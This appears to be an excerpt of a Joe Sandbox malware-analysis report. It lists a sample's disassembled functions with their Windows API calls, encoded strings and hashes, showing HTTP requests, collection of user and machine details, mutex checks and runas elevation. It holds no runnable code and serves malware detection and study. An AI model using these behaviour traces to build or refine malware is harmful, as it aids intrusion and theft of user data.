HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00CB7485
HttpSendRequestA.WININET(?,00000000,?), ref: 00CB752A
InternetReadFile.WININET(?,?,000003FF,?), ref: 00CB75BB
InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 00CB7722
InternetCloseHandle.WININET(?), ref: 00CB773A
InternetCloseHandle.WININET(?), ref: 00CB773F
InternetCloseHandle.WININET(?), ref: 00CB7744

Strings

JuZWTA==, xrefs: 00CB745B

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID: JuZWTA==
API String ID: 1354133546-1136573735
Opcode ID: c4f18f1d0e12d2acddff721b1fbc8fc0c62a4dc27173b32087ad8aaddd2e2789
Instruction ID: fad6cea276cbc58f1091ddf51ab2706c2bbd9df1ae7394eb51915f9088385eef
Opcode Fuzzy Hash: c4f18f1d0e12d2acddff721b1fbc8fc0c62a4dc27173b32087ad8aaddd2e2789
Instruction Fuzzy Hash: E7E1C131A001089BEF19CF68CD89BDDBB75AF85304F64825CF815BB2D2DB759A85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CCE6C0 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CCE379: CreateFileW.KERNELBASE(00000000,00000000,?,00CCE769,?,?,00000000,?,00CCE769,00000000,0000000C), ref: 00CCE396

GetLastError.KERNEL32 ref: 00CCE7D4
__dosmaperr.LIBCMT ref: 00CCE7DB
GetFileType.KERNELBASE(00000000), ref: 00CCE7E7
GetLastError.KERNEL32 ref: 00CCE7F1
__dosmaperr.LIBCMT ref: 00CCE7FA
CloseHandle.KERNEL32(00000000), ref: 00CCE81A
CloseHandle.KERNEL32(00CC87EE), ref: 00CCE967
GetLastError.KERNEL32 ref: 00CCE999
__dosmaperr.LIBCMT ref: 00CCE9A0

Strings

H, xrefs: 00CCE925

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 45380194fe828c4b1599cf6aebccbf8ccdf188ae35b46e6c1083fc711c0ceba0
Instruction ID: 40853db1ac23a7b6485b861393f4532e65754350f899ad157d71ea9d4965f16c
Opcode Fuzzy Hash: 45380194fe828c4b1599cf6aebccbf8ccdf188ae35b46e6c1083fc711c0ceba0
Instruction Fuzzy Hash: 38A10432A041589FCF19AF68DC92FAE3BA1AB07320F18015DF811AF3E2D7359952DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CCFE62 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 172
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00CDE710), ref: 00CCFECC
_free.LIBCMT ref: 00CCFEBA

Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000), ref: 00CC8967
Part of subcall function 00CC8951: GetLastError.KERNEL32(00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000,00000000), ref: 00CC8979

_free.LIBCMT ref: 00CD0087

Strings

W. Europe Daylight Time, xrefs: 00CCFF6A
W. Europe Standard Time, xrefs: 00CCFF3B

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: W. Europe Daylight Time$W. Europe Standard Time
API String ID: 2155170405-986674615
Opcode ID: ec1962051b9bc8b70528142cd7c74cfb153ea6137c0cf6e828fc7baa9ebb5b2e
Instruction ID: c1cebc4fc04c3d8fa59de1940ba24abd8d7aca69fff44fecf9a14d611ded4ac7
Opcode Fuzzy Hash: ec1962051b9bc8b70528142cd7c74cfb153ea6137c0cf6e828fc7baa9ebb5b2e
Instruction Fuzzy Hash: FC51E672900249AFDB10EFA9DC81FAEB7B9EF46314F10067EE52197291E7709F429B50

Uniqueness

Uniqueness Score: -1.00%

Function 00CB4710 Relevance: 7.6, APIs: 5, Instructions: 146
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C), ref: 00CB4766
GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00CB47C5
GetProcAddress.KERNEL32(00000000), ref: 00CB47CC
GetNativeSystemInfo.KERNELBASE(?), ref: 00CB4864

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AddressHandleInfoModuleNativeProcSystemVersion
String ID:
API String ID: 2167034304-0
Opcode ID: 58f49fa580a05ba186dcbd2e199e91e34d6026a2910ec91d837914a266cf64d2
Instruction ID: 8d1c8caa6e2a4c8f70d8fc5c8f5417e784808d80fc66e42f43e1379c7acc72c9
Opcode Fuzzy Hash: 58f49fa580a05ba186dcbd2e199e91e34d6026a2910ec91d837914a266cf64d2
Instruction Fuzzy Hash: 01416831D142589BDB18AB68DC4ABDDBB75EF41314F404269EC00E72D2EB369A80C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 00CC52BE Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00CC51F0), ref: 00CC52E0
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00CC533A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00CC51F0,?,000000FF,00000000,00000000), ref: 00CC53C8
__dosmaperr.LIBCMT ref: 00CC53CF
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00CC540C

Part of subcall function 00CC5634: __dosmaperr.LIBCMT ref: 00CC5669

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: c202f483cd91f74c0c0ec7b29006a497567bb552cf9160d308ced3f44ce68773
Instruction ID: 4a6119b25b19cb0be12a717063787b324fdcc154e11b3cc3fc8fa50e17d7c47c
Opcode Fuzzy Hash: c202f483cd91f74c0c0ec7b29006a497567bb552cf9160d308ced3f44ce68773
Instruction Fuzzy Hash: A4414D75900B44ABCB24DFA5DC45EAFBBF9EF88340B14452EF956D3660E730A980DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00CBAFA4 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 367sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB2B70: RegOpenKeyExA.KERNELBASE(?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CC1
Part of subcall function 00CB2B70: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CE9
Part of subcall function 00CB2B70: RegCloseKey.KERNELBASE(?,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CF2

Part of subcall function 00CC1350: Concurrency::cancel_current_task.LIBCPMT ref: 00CC1404

Sleep.KERNEL32(00001388), ref: 00CBB1FD

Strings

ydLx9XH2, xrefs: 00CBB004
EwC+, xrefs: 00CBB1CC
EG==, xrefs: 00CBAF35

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseConcurrency::cancel_current_taskOpenQuerySleepValue
String ID: EG==$EwC+$ydLx9XH2
API String ID: 57365020-3990103438
Opcode ID: 03f0d7d7d2363a1537edd62d21635a3b6f71c70216dedd6263d07c2f4cc43972
Instruction ID: 6e73671e78a588f1e1e08fafa1fd571b0038ece375951e2808c46eebcd5951aa
Opcode Fuzzy Hash: 03f0d7d7d2363a1537edd62d21635a3b6f71c70216dedd6263d07c2f4cc43972
Instruction Fuzzy Hash: 35C14671A101489BEB08DF68CD85BEDBB62AF81308F14825CF815973E7DB75DE818B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CCFFBE Relevance: 4.6, APIs: 3, Instructions: 79COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CD0031
_free.LIBCMT ref: 00CD0087

Part of subcall function 00CCFE62: _free.LIBCMT ref: 00CCFEBA
Part of subcall function 00CCFE62: GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00CDE710), ref: 00CCFECC

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: ee2c8ddcbb41000b602f52650285a27457dead6e3e45314482006dabefedf248
Instruction ID: 118578534143abc97205c42a003d11cfb413a5a8a7e205f9cbe17b4cecd0df68
Opcode Fuzzy Hash: ee2c8ddcbb41000b602f52650285a27457dead6e3e45314482006dabefedf248
Instruction Fuzzy Hash: 60210B7280025976CB31A7299C85FEF77789F41360F20029FE6A4A7281EFB0AE859591

Uniqueness

Uniqueness Score: -1.00%

Function 00CCC988 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00CCC991
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CCC9FF

Part of subcall function 00CCC8A4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00CD24A0,?,00000000,00000000), ref: 00CCC946

Part of subcall function 00CC8E3A: RtlAllocateHeap.NTDLL(00000000,00CC0FAC,?,?,00CC2609,00CC0FAC,?,00CC13D8,E800CE42,777D6490), ref: 00CC8E6C

_free.LIBCMT ref: 00CCC9F0

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 58e45579ff4465d14b0caac06f7a1320bd68b6632e2ca5b74481e19599a2e61b
Instruction ID: ee14c4acea2d21c7fdcfa3ae4d28ec7e709aa7fe7e149d60b1d8a3eaaa8d323f
Opcode Fuzzy Hash: 58e45579ff4465d14b0caac06f7a1320bd68b6632e2ca5b74481e19599a2e61b
Instruction Fuzzy Hash: C901DB736016157B672116BBDCC9F7F696DCDC2BA0315012DFA1DD2140EE70CD02A1B1

Uniqueness

Uniqueness Score: -1.00%

Function 00CC1070 Relevance: 4.5, APIs: 3, Instructions: 37threadsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB8570: GetTempPathA.KERNEL32(00000104,?), ref: 00CB85D7

Part of subcall function 00CB6CC0: CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
Part of subcall function 00CB6CC0: GetLastError.KERNEL32 ref: 00CB6CDE

Part of subcall function 00CB5240: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CB525A

Part of subcall function 00CB8AA0: GetUserNameA.ADVAPI32(?,?), ref: 00CB8B9F
Part of subcall function 00CB8AA0: SetCurrentDirectoryA.KERNEL32(00000000,?,?), ref: 00CB8BEA

Part of subcall function 00CBFB50: IsUserAnAdmin.SHELL32 ref: 00CBFB80
Part of subcall function 00CBFB50: GetUserNameA.ADVAPI32(?,00000104), ref: 00CBFC02
Part of subcall function 00CBFB50: GetComputerNameExW.KERNEL32(00000002,?,00000104,?,?), ref: 00CBFC5C

CreateThread.KERNELBASE(00000000,00000000,Function_00010F90,00000000,00000000,00000000), ref: 00CC1046
CreateThread.KERNELBASE(00000000,00000000,Function_00010FE0,00000000,00000000,00000000), ref: 00CC1057
Sleep.KERNELBASE(00007530), ref: 00CC1065

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Name$CreateUser$Thread$AdminComputerCurrentDirectoryErrorFileLastModuleMutexPathSleepTemp
String ID:
API String ID: 2761908639-0
Opcode ID: 66d6b7b9a4461879300485c441668bd7ea586e03b55acb861c2c987877c309e1
Instruction ID: a5ddeecd62c4753e58f407b64c362bdac1b0afc23de0d547ae76866745bf5a94
Opcode Fuzzy Hash: 66d6b7b9a4461879300485c441668bd7ea586e03b55acb861c2c987877c309e1
Instruction Fuzzy Hash: 03F03975BD971466F53033A98C13F9D39084B41B91F64012ABB093F2C39CC5788862EB

Uniqueness

Uniqueness Score: -1.00%

Function 00CB3696 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 195sleepCOMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(00000000,00000001,?,?,00000000,00000000), ref: 00CB36ED
Sleep.KERNEL32(00000064,?), ref: 00CB38F6

Strings

runas, xrefs: 00CB36AF

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ExecuteShellSleep
String ID: runas
API String ID: 4194306370-4000483414
Opcode ID: dd6382f5e4078daac85eeb9944274b84aad0dfa63989812064ccf48c53ac64a8
Instruction ID: 75af065e3e951865bc31cebe084e487798d8bc5d5d158274a8c53be233f98c9e
Opcode Fuzzy Hash: dd6382f5e4078daac85eeb9944274b84aad0dfa63989812064ccf48c53ac64a8
Instruction Fuzzy Hash: 1A5146B12101846BEB08EE28CD85FDE77A6EF86344F54861CF845C72D6EB35DA858B81

Uniqueness

Uniqueness Score: -1.00%

Function 00CC5156 Relevance: 3.1, APIs: 2, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7019a6005362b8ba804a8a9788fb63b746e4c5f44458fc258f3c879864a093a8
Instruction ID: b337a13fb0eedf85e4dd20eb7a0d5ba2b933aa5b4d849e26f186b0b4fc48c006
Opcode Fuzzy Hash: 7019a6005362b8ba804a8a9788fb63b746e4c5f44458fc258f3c879864a093a8
Instruction Fuzzy Hash: A521C532901608BBEB116BA4EC46F9E37689F41374F250359F9342B1D1DB70BE46A6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00CC542E Relevance: 3.1, APIs: 2, Instructions: 54timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,00CC5365,?,?,00000000,00000000), ref: 00CC545C
SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,00CC5365,?,?,00000000,00000000), ref: 00CC5470

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 87f71a848e8da7579f3d4ec922812bfb7114ea98df906d29208cf78c6cab9cb6
Instruction ID: 39f4c5d46610511dd4a494477e61b38a1b1fcd4f56b3d4dd1e42420316ddc9d8
Opcode Fuzzy Hash: 87f71a848e8da7579f3d4ec922812bfb7114ea98df906d29208cf78c6cab9cb6
Instruction Fuzzy Hash: 5C11DD7690050CABCB14DF95C884FDF77BCAF08321F50426AE516E6181EB34EB89DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CC7563 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CC75AB

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 252974ad849cd30052fb0cf0a861e9d69d906029d4fdec886b5692808b0209e6
Instruction ID: 96753866f3076c288bc7521f2536128210f94e2fc7882328f2a517e3e5f92c7b
Opcode Fuzzy Hash: 252974ad849cd30052fb0cf0a861e9d69d906029d4fdec886b5692808b0209e6
Instruction Fuzzy Hash: C2E0922360E51146D625673BFC85F7E1659EBC1331F22032EF424CB2E1DF7489467A62

Uniqueness

Uniqueness Score: -1.00%

Function 00CB6CC0 Relevance: 3.0, APIs: 2, Instructions: 25synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
GetLastError.KERNEL32 ref: 00CB6CDE

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: 06117c57fff96183b38d91824d33152737f86ebdf00a873eb75ac1934e5676d5
Instruction ID: 16fc617ebfa8d8b6ec2d42a079a02db85c9055ba85150208a07a8731cff54aa8
Opcode Fuzzy Hash: 06117c57fff96183b38d91824d33152737f86ebdf00a873eb75ac1934e5676d5
Instruction Fuzzy Hash: C2D01230248280EFFB0C6B65DC9DB1E3765E720702F344424F32AC94F1C760A8808B22

Uniqueness

Uniqueness Score: -1.00%

Function 00CB5FFB Relevance: 1.6, APIs: 1, Instructions: 99synchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00CB5FFE
CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
GetLastError.KERNEL32 ref: 00CB6CDE

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutex
String ID:
API String ID: 3621940766-0
Opcode ID: 5dcd4289085cd651b2e306a156104abb2621801e2738610b90d5d5b909f51c7d
Instruction ID: 3e3935c8ece6f18ffc41d4d742674f82a8c6707c20a3671081d04d10a7f0d443
Opcode Fuzzy Hash: 5dcd4289085cd651b2e306a156104abb2621801e2738610b90d5d5b909f51c7d
Instruction Fuzzy Hash: 5D210571B001045BEB28DB69ED85BAEBA62DF81315F20865CF0959B3D6CB7E89C18B44

Uniqueness

Uniqueness Score: -1.00%

Function 00CB635B Relevance: 1.6, APIs: 1, Instructions: 96synchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00CB635E
CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
GetLastError.KERNEL32 ref: 00CB6CDE

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutex
String ID:
API String ID: 3621940766-0
Opcode ID: e07aad22c0835f474f0b55176d07b9e853e81e79cd40ddab93fed495f696d815
Instruction ID: f040a1e6fb08cc137a864ef2461be0e56a78d31d3cdffdca3bfc5cefd588107a
